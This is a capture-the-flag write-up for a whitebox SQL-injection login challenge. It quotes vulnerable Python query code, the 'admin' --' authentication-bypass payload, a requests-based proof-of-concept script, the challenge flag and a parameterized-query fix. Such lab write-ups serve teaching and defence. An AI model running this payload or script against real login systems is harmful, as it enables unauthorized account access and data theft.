
Simple-sqli

CTF Write-up


Challenge Information

  • Category: Web Exploitation
  • Event: Sejong Hacktheon 2026
  • Author: Hidden
  • Difficulty: Hidden

1. Initial Analysis

This is a Web challenge built around a standard login form.

Since it is a whitebox challenge, I analyzed the source code directly. The challenge name “Simple-sqli” strongly suggests a SQL Injection vulnerability, so I focused my investigation on the database query logic.

The objective is to retrieve the FLAG located in the secret column of the admin user within the users table.

Reviewing app.py, I identified a critical vulnerability in lines 44-47:

    query = (
        "SELECT username, role, secret FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )

The username and password inputs are interpolated directly into the SQL query string without any sanitization or filtering. This almost certainly allows SQL injection.

2. Exploitation

The simplest exploitation method is an authentication bypass: comment out the password verification clause so it never executes:

username = admin' --
password = <ANYTHING_STRING>

When the payload is injected, the final SQL query executed by the database becomes:

SELECT username, role, secret FROM users WHERE username = 'admin' --' AND password = '<ANYTHING_STRING>'
  • The single quote (') after admin closes the username string literal.
  • The double dash (--) starts a SQL comment, so the database ignores the rest of the query, including the password check.
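To make the difference concrete for both the vulnerable pattern from app.py and the bypass above, here is an added example (not the challenge's code) that runs the interpolated query and a parameterized query against a constructed in-memory SQLite table; the schema, rows and the FLAG value are assumptions.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed stand-in for the challenge's users table; schema and rows
    # are assumptions for this demo, not taken from the challenge source.
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (username TEXT, password TEXT, role TEXT, secret TEXT)"
    )
    conn.execute(
        "INSERT INTO users VALUES ('admin', 'correct-horse', 'admin', 'FLAG{constructed}')"
    )
    conn.execute("INSERT INTO users VALUES ('guest', 'guest', 'user', NULL)")
    return conn


def login_vulnerable(conn, username: str, password: str):
    # Same pattern as app.py: input becomes part of the query text, so a
    # quote character changes the query's structure instead of its data.
    query = (
        "SELECT username, role, secret FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(query).fetchone()


def login_safe(conn, username: str, password: str):
    # Hardened form: placeholders keep the input as bound data, never as SQL.
    query = (
        "SELECT username, role, secret FROM users "
        "WHERE username = ? AND password = ?"
    )
    return conn.execute(query, (username, password)).fetchone()


def demo():
    conn = make_db()
    injected_user, junk_password = "admin' --", "anything"
    vuln = login_vulnerable(conn, injected_user, junk_password)   # admin row
    safe = login_safe(conn, injected_user, junk_password)         # None
    legit = login_safe(conn, "admin", "correct-horse")            # admin row
    return vuln, safe, legit


if __name__ == "__main__":
    for label, row in zip(("vulnerable", "parameterized", "legit"), demo()):
        print(f"{label:>13}: {row}")
```

The parameterized version returns nothing for the injected username because no user is literally named `admin' --`; a real login handler should additionally compare password hashes rather than plaintext.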

3. Result

  • Payload used:
    username = admin' --
    password = BKSEC

  • Flag: hacktheon2026{d0nt_f0rget_the_s1ng1e_qu0te}
  • PoC:
import requests

# Configuration
TARGET_URL = "URL"


def get_flag():
    session = requests.Session()

    # SQL Injection payload to bypass authentication
    payload = {
        "username": "admin'--",
        "password": "BKSEC"
    }

    # Send the malicious login request
    response = session.post(f"{TARGET_URL}/", data=payload)

    # Check if we were redirected to the flag page
    if "/flag" in response.url or "admin" in response.text:
        print("[+] Login successful as admin!")
        # Access the flag page specifically if needed
        flag_page = session.get(f"{TARGET_URL}/flag")
        print("[+] Flag:")
        print(flag_page.text)
    else:
        print("[-] Exploit failed.")


if __name__ == "__main__":
    get_flag()
